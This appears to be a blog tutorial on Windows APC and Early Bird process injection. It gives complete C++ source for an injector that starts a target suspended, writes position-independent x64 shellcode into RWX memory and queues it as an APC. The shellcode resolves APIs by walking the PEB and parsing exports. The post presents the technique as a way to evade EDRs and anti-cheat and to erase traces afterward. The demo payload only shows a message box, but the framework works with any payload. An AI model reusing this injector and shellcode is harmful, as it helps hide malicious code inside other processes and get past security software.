APC and Early Bird Injections

"I feel sick"

May 27, 2023

Hello all. This is most likely the last injection technique I will discuss for a while. Maybe. Anyway, today we’re talking about Windows Asynchronous Procedure Calls (APCs), which give us two injection methods: APC injection and Early Bird injection.

Before You Read

It is recommended to read these related posts before reading this one, so that you don’t get lost during the discussion of the concepts:

What

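First, we need to know about APCs. APCs are exactly what the name says: functions that execute asynchronously in the context of a particular thread. Every thread has its own queue of APCs. User-mode APCs in that queue are delivered when the thread enters what’s called an alertable state, for example by calling SleepEx or WaitForSingleObjectEx with the alertable flag set.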
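To make the queue-plus-alertable-state idea concrete, here is a toy model in portable C++. It is not the Windows API: ToyThread, QueueApc, DoWork and AlertableWait are hypothetical names made up for illustration. It only shows the ordering rule, namely that queued functions sit in a per-thread FIFO and run when the thread performs an alertable wait, not while it is doing ordinary work.

```cpp
#include <cassert>
#include <deque>
#include <functional>
#include <string>
#include <utility>
#include <vector>

// Hypothetical toy model of one thread's user-mode APC queue.
// This is NOT the Windows API; it only mimics the delivery order.
struct ToyThread {
    std::deque<std::function<void()>> apcQueue; // pending APCs, first in first out
    std::vector<std::string> log;               // records what ran, in order

    // Queue a function to run later in this thread's context.
    void QueueApc(std::function<void()> fn) { apcQueue.push_back(std::move(fn)); }

    // Ordinary (non-alertable) work: pending APCs are not delivered here.
    void DoWork(const std::string& what) { log.push_back("work:" + what); }

    // Alertable wait: every pending APC runs, in FIFO order, then the wait returns.
    void AlertableWait() {
        while (!apcQueue.empty()) {
            std::function<void()> fn = std::move(apcQueue.front());
            apcQueue.pop_front();
            fn();
        }
        log.push_back("wait-returned");
    }
};

// Queue two APCs, do some ordinary work, then enter an alertable wait.
std::vector<std::string> RunToyApcDemo() {
    ToyThread t;
    t.QueueApc([&t] { t.log.push_back("apc:first"); });
    t.QueueApc([&t] { t.log.push_back("apc:second"); });
    t.DoWork("before-wait");
    t.AlertableWait();
    return t.log;
}
```

In this model the log ends up with the ordinary work first, then both queued functions in the order they were queued, then the wait returning. On real Windows the corresponding calls would be QueueUserAPC and an alertable wait such as SleepEx.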

If you are a malicious actor, you could queue an APC on a thread in another process and have that thread run some malicious code for you. In some cases, you can inject yourself into a process this way.

Under this wing of APC injection, there is also an injection method that allows the process to be injected before it fully loads. This is called Early Bird injection.

Some processes and/or AVs have their own protection against being hijacked. In some cases, however, these protections are initialized only after the process starts. So if there is a way to inject before they start up, you could disable them entirely or prevent them from loading.

Why

Most EDRs scan the functions that are attached to process APC queues, so if you are able to encrypt your payload (or be able to deploy some assembly wrapping), you might be able to bypass them.

But, as to why… well, they’re cool!

How

It’s been a while since I’ve uploaded anything to my Tor site. So I’ve uploaded some stuff for you there. It’s in apc.zip under the programs/ folder.

In here are 2 programs, helloworld.exe and earlybird.exe. Let’s discuss.

First, helloworld.exe is very simple. It just prints “Hello, world!”. It’s included because it does this in main(), which runs almost immediately after the process starts. That makes it difficult to get any code of our own running before main() does. This is where early bird injections come into play.

Since early bird injection creates the process suspended, main() hasn’t executed yet. In fact, almost nothing has happened yet. You can’t even iterate the process’ modules this early. The executable’s entry point, mainCRTStartup() (the implicit function that runs global constructors and then calls main()), hasn’t run either, so neither global constructors nor main() have executed.

This is beneficial, because there might be some defensive mechanisms that take place in the main() function or in global constructors. In fact, some video game anti-cheats do this. Not telling which ones, though :).
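As a small, harmless illustration of the ordering described above, the sketch below shows a global object whose constructor runs before main() ever gets control. The names StartupLog, EarlyGuard and GuardRanBeforeMain are made up for this example; a real program would do its early setup in a constructor like this one.

```cpp
#include <cassert>
#include <string>
#include <vector>

// Function-local static, so the log exists no matter which global is built first.
std::vector<std::string>& StartupLog() {
    static std::vector<std::string> log;
    return log;
}

// Hypothetical stand-in for "some setup that happens in a global constructor".
struct EarlyGuard {
    EarlyGuard() { StartupLog().push_back("global-ctor"); }
};

// Constructed by the runtime's startup code, before main() is called.
EarlyGuard g_guard;

// True if the global constructor has already run by the time this is called.
bool GuardRanBeforeMain() {
    return !StartupLog().empty() && StartupLog().front() == "global-ctor";
}
```

If you call GuardRanBeforeMain() as the first statement of main(), the constructor has already run. In a process created with CREATE_SUSPENDED, none of this startup code has executed yet, which is the window early bird injection relies on.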

So, let’s now look at earlybird.cpp, part by part.

First of all, unlike most other injection methods, early bird injection needs a path to an executable rather than the name/pid of a running process, because it launches the target itself.

Secondly, once it has the path, it calls CreateProcessA and passes CREATE_SUSPENDED in the creation flags.

int main(int argc, char **argv)
{
	if (argc < 2)
	{
		std::cout << "Usage: " << argv[0] << " <filepath>" << std::endl;
		return 1;
	}

	char* filepath = argv[1];
	// Create suspended process at filepath
	STARTUPINFOA si{};
	PROCESS_INFORMATION pi{};
	if (!CreateProcessA(filepath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
	{
		std::cout << "Failed to create process. Is your path correct? Error " << GetLastError() << std::endl;
		return 1;
	}

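Then, it allocates one page (0x1000 bytes) of RWX memory in the new process and copies the shellcode into it (we’ll get to the shellcode later, it’s a bit of a doozy). “Shellcode” is the name of the shellcode function. Copying a fixed 0x1000 bytes assumes the compiled function fits within a single page.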

	void* shellcode = VirtualAllocEx(pi.hProcess, NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (!shellcode)
	{
		std::cout << "Failed to allocate memory in process. Error " << GetLastError() << std::endl;
		return 1;
	}

	// Write shellcode to process
	if (!WriteProcessMemory(pi.hProcess, shellcode, Shellcode, 0x1000, NULL))
	{
		std::cout << "Failed to write shellcode to process. Error " << GetLastError() << std::endl;
		return 1;
	}

Now, all that’s left is to queue the APC and then resume the thread.

	// Queue APC
	if (!QueueUserAPC((PAPCFUNC)shellcode, pi.hThread, NULL))
	{
		std::cout << "Failed to queue APC. Error " << GetLastError() << std::endl;
		return 1;
	}

	// Resume thread (ResumeThread returns the previous suspend count, or (DWORD)-1 on failure)
	if (ResumeThread(pi.hThread) == (DWORD)-1)
	{
		std::cout << "Failed to resume thread. Error " << GetLastError() << std::endl;
		return 1;
	}

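That’s it. When the thread is resumed, it doesn’t jump straight to the program’s entry point. It first runs the loader’s initialization code in ntdll, and as far as I understand it, pending user-mode APCs are delivered during that startup. That means our queued function runs before main()!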

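If we want to be sneaky (we do), we can wait for the thread to finish and then zero out the memory we just allocated. Then we can free it. Note that the wait only returns once the target’s main thread has exited, so by then the process may already be gone and these calls can fail. Their return values are ignored here.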

	// Wait for thread to finish
	WaitForSingleObject(pi.hThread, INFINITE);

	// Free memory
	BYTE zeroed[0x1000]{};
	WriteProcessMemory(pi.hProcess, shellcode, zeroed, 0x1000, NULL);
	VirtualFreeEx(pi.hProcess, shellcode, 0, MEM_RELEASE);

	// Close handles
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	return 0;
}

Now, let’s talk shellcode.

Unlike the shellcode I usually use, I did not want to write all of this by hand. Hell no.

In this example, instead of doing any hooks or whatever, I just launch a MessageBox. Since MessageBox blocks the calling thread while the box is open, you can clearly see that it is executed and opened before “Hello, world!” is printed. I could’ve just passed the address of MessageBoxA as the APC function too, but that’s not very fun. (Also, it might not have worked if user32.dll wasn’t loaded in the target.) Anyway, let’s start talking shellcode.

First, we need to walk the PEB. By walking the PEB’s loader module list, we can retrieve the base address of KERNELBASE.dll, which exports LoadLibraryA and GetProcAddress through its export address table (EAT). We need those two to get the address of MessageBoxA.

Doing this by hand in assembly would suck, so we just write some basic C code that 1: doesn’t use any global addressing (strings, global variables) and 2: doesn’t make any non-inlined function calls.

Lastly, this is x64 shellcode. On x86 the PEB pointer lives at fs:[0x30] instead of gs:[0x60], so you would change __readgsqword(0x60) to __readfsdword(0x30), and it might work. Maybe.

NTSTATUS Shellcode(ULONG_PTR param)
{
	// Walk the PEB until we find KERNELBASE
	wchar_t stackKB[] = {'K', 'E', 'R', 'N', 'E', 'L', 'B', 'A', 'S', 'E', '.', 'd', 'l', 'l', 0};
	HMODULE hKB = 0;

	PPEB peb = (PPEB)__readgsqword(0x60);
	PPEB_LDR_DATA ldr = peb->Ldr;

	for (PLIST_ENTRY entry = ldr->InMemoryOrderModuleList.Flink; entry != &ldr->InMemoryOrderModuleList; entry = entry->Flink)
	{
		PLDR_DATA_TABLE_ENTRY mod = CONTAINING_RECORD(entry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
		if (mod->DllBase == nullptr)
			continue;

		wchar_t *modName = (wchar_t *)mod->FullDllName.Buffer;
		// Strip path
		wchar_t *stripped = modName + mod->FullDllName.Length / sizeof(wchar_t);
		while (stripped != modName && *stripped != '\\')
			stripped--;
		if (*stripped == '\\')
			stripped++;

		// Compare
		if (__wcscmp(stripped, stackKB) == 0)
		{
			hKB = (HMODULE)mod->DllBase;
			break;
		}
	}

	// Crash if kernelbase doesn't exist (running on XP or native app)
	if (hKB == 0)
	{
		***(char ***)0 = 0;
	}

A few things to note here.

Strings are built on the stack rather than read from the .rdata section. A string literal compiles down to a load from an address relative to the code, and once the function has been copied into another process that address no longer points at the string. That would almost certainly cause a segfault, unless you embed the entire program as your payload, which would be a bit loud.
Since the loader entry’s FullDllName holds the full path rather than just the base DLL name, we need to strip the leading path to get the base name. Rather straightforward.
There are, of course, no calls to any functions or imports. Or are there? You may have noticed __wcscmp. What could this be? It’s just an inlined function that I wrote. I also wrote one for char* instead of just wchar_t*.

__forceinline ptrdiff_t __strcmp(const char *s1, const char *s2)
{
	while (*s1 && (*s1 == *s2))
		s1++, s2++;
	return *(const unsigned char *)s1 - *(const unsigned char *)s2;
}

__forceinline ptrdiff_t __wcscmp(const wchar_t *s1, const wchar_t *s2)
{
	while (*s1 && (*s1 == *s2))
		s1++, s2++;
	return *(const unsigned short *)s1 - *(const unsigned short *)s2;
}

Note that __forceinline doesn’t always force inlining. It depends on the optimization settings that you send to the compiler. In this case, it inlines these so they are included in the singular Shellcode function. This simply helps legibility.
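The path stripping and comparison logic is easy to try outside of shellcode. The sketch below is a portable re-creation using hypothetical names (WideCompare, StripPath, IsKernelBase) and plain C++ instead of the Windows loader structures. It assumes the buffer is null-terminated and that the length is given in characters, excluding the terminator.

```cpp
#include <cassert>
#include <cstddef>

// Same loop as the post's __wcscmp, under a hypothetical portable name.
static inline std::ptrdiff_t WideCompare(const wchar_t* s1, const wchar_t* s2) {
    while (*s1 && (*s1 == *s2)) {
        ++s1;
        ++s2;
    }
    return static_cast<std::ptrdiff_t>(*s1) - static_cast<std::ptrdiff_t>(*s2);
}

// Walk backwards from the end of the path to the last backslash and return
// a pointer to the component after it (or the whole string if there is none).
static inline const wchar_t* StripPath(const wchar_t* path, std::size_t lengthInChars) {
    const wchar_t* p = path + lengthInChars; // points at the terminator
    while (p != path && *p != L'\\')
        --p;
    if (*p == L'\\')
        ++p;
    return p;
}

// Case-sensitive check, like the original: does this path name KERNELBASE.dll?
bool IsKernelBase(const wchar_t* fullPath, std::size_t lengthInChars) {
    // Built element by element, mirroring the stack strings in the shellcode.
    const wchar_t target[] = {L'K', L'E', L'R', L'N', L'E', L'L', L'B', L'A',
                              L'S', L'E', L'.', L'd', L'l', L'l', 0};
    return WideCompare(StripPath(fullPath, lengthInChars), target) == 0;
}
```

Note that the comparison is case-sensitive, so a path ending in kernelbase.dll would not match. That is the same behavior as the code in this post.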

Next, we need to retrieve LoadLibraryA and GetProcAddress. This is done by parsing the PE header of KERNELBASE to find its export directory, then iterating over the exported names to grab these two.

	// Important functions
	decltype(&LoadLibraryA) pLoadLibraryA = nullptr;
	decltype(&GetProcAddress) pGetProcAddress = nullptr;

	char stackLLA[] = {'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', 0};
	char stackGPA[] = {'G', 'e', 't', 'P', 'r', 'o', 'c', 'A', 'd', 'd', 'r', 'e', 's', 's', 0};

	// Get DOS header
	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hKB;
	// Get NT headers
	PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)hKB + dosHeader->e_lfanew);
	// Get export directory
	PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)hKB + ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
	// Get address of names
	DWORD *names = (DWORD *)((DWORD_PTR)hKB + exportDirectory->AddressOfNames);
	// Get address of functions
	DWORD *functions = (DWORD *)((DWORD_PTR)hKB + exportDirectory->AddressOfFunctions);
	// Get address of ordinals
	WORD *ordinals = (WORD *)((DWORD_PTR)hKB + exportDirectory->AddressOfNameOrdinals);

	// Loop through names
	for (size_t i = 0; i < exportDirectory->NumberOfNames; i++)
	{
		// Get name
		char *namePtr = (char *)((DWORD_PTR)hKB + names[i]);
		// Compare name
		if (!__strcmp(namePtr, stackLLA))
		{
			// Get address of function
			pLoadLibraryA = (decltype(&LoadLibraryA))((DWORD_PTR)hKB + functions[ordinals[i]]);
		}
		else if (!__strcmp(namePtr, stackGPA))
		{
			// Get address of function
			pGetProcAddress = (decltype(&GetProcAddress))((DWORD_PTR)hKB + functions[ordinals[i]]);
		}
	}

decltype is evaluated at compile time, so decltype(&LoadLibraryA) only borrows the function’s type for the pointer declaration. It doesn’t make the shellcode reference or import the function itself. This is also rather straightforward.
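The one non-obvious part of the export lookup is the double indexing, functions[ordinals[i]]. The names array and the ordinals array run in parallel, and the ordinal entry is the index into the functions array, which can have a different order and more entries. Here is a toy model of just that indirection, using a hypothetical ToyExports struct and made-up export names and RVAs rather than real PE structures.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical, simplified stand-in for the three export arrays.
struct ToyExports {
    const char* const* names;       // names[i]: i-th exported name
    const std::uint16_t* ordinals;  // ordinals[i]: index into functions for names[i]
    const std::uint32_t* functions; // functions[k]: RVA of the k-th export
    std::size_t numberOfNames;      // length of names and ordinals
};

// Returns the RVA for the named export, or 0 if the name is not present.
std::uint32_t FindExportRva(const ToyExports& e, const char* wanted) {
    for (std::size_t i = 0; i < e.numberOfNames; ++i) {
        if (std::strcmp(e.names[i], wanted) == 0)
            return e.functions[e.ordinals[i]]; // name index -> ordinal -> function
    }
    return 0;
}

// Made-up table: three named exports plus one function exported by ordinal only.
std::uint32_t DemoLookup(const char* wanted) {
    static const char* const names[] = {"Alpha", "Beta", "Gamma"};
    static const std::uint16_t ordinals[] = {2, 0, 1};
    static const std::uint32_t functions[] = {0x1000, 0x2000, 0x3000, 0x4000};
    const ToyExports e{names, ordinals, functions, 3};
    return FindExportRva(e, wanted);
}
```

In this made-up table, "Alpha" is the first name but maps to the third function entry, so indexing functions directly by the name index would return the wrong address. In the real code, the resulting RVA is then added to the module base.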

Lastly, get the address of MessageBoxA and call it.

	// Get address of MessageBoxA
	char stackMBA[] = {'M', 'e', 's', 's', 'a', 'g', 'e', 'B', 'o', 'x', 'A', 0};
	char stackU32[] = {'u', 's', 'e', 'r', '3', '2', '.', 'd', 'l', 'l', 0};
	decltype(&MessageBoxA) pMessageBoxA = (decltype(&MessageBoxA))pGetProcAddress(pLoadLibraryA(stackU32), stackMBA);

	// Call MessageBoxA
	char stackHello[] = {'H', 'e', 'l', 'l', 'o', ',', ' ', 'w', 'o', 'r', 'l', 'd', '!', 0};
	pMessageBoxA(NULL, stackHello, stackHello, MB_OK);
	return 0;
}

That’s it. But when you compile this program, pass these flags so the shellcode doesn’t end up crashing.

cl .\earlybird.cpp /EHsc /GS- /O2

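/EHsc enables standard C++ exception handling (unwind semantics). The injector uses std::cout, and MSVC’s iostream headers expect exception handling to be enabled. Without the flag you get warning C4530.

/GS- tells the compiler not to emit security cookie checks (stack buffer overrun protection). With /GS enabled, the Shellcode function would load the global __security_cookie and call __security_check_cookie, both of which live in the injector’s image. Once the function is copied into another process, those references point at whatever happens to be there, which will almost certainly cause a segfault.

/O2 is for optimizations favoring speed. It speeds up the program in general, and it also enables inline expansion (it implies /Ob2), so the forced inlining of those string comparison functions is actually honored.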

I’ve included a .bat file for you to build without copying and pasting more stuff. Look how nice I am. Just run it from the MSVC x64 native command prompt.

Now, all that’s left to do is to run it.

Let’s run helloworld.exe first.